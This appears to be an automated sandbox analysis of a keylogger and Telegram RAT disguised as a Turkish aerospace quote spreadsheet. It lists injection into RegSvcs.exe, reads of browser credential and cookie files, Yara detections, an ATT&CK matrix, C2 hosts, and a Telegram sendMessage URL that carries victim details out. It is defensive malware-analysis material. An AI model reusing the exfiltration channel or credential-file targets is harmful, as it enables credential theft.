Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A09D5 SetUnhandledExceptionFilter,	0_2_001A09D5
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001A0C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5E3008

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

0_2_001E1201

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_001C2BA5

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001EB226 SendInput,keybd_event,

0_2_001EB226

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_002022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002022DA

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

0_2_001E0B62

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_001E1663

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001A0698 cpuid

0_2_001A0698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_001F8195

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001DD27A GetUserNameW,

0_2_001DD27A

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_001BB952

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001842DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: WIN_81
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: WIN_XP
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: WIN_XPe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: WIN_VISTA
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: WIN_7
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2658183432.000000000290B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00201204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00201204
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00201806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00201806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	11 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	221 Security Software Discovery	SSH	121 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Virtualization/Sandbox Evasion	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	29%	Virustotal		Browse
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	37%	ReversingLabs	Win32.Trojan.AutoitInject
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	RegSvcs.exe, 00000002.00000002.2658183432.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a	RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	RegSvcs.exe, 00000002.00000002.2658183432.00000000029EF000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000002.00000002.2658183432.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enpv	RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/pv	RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	false	high
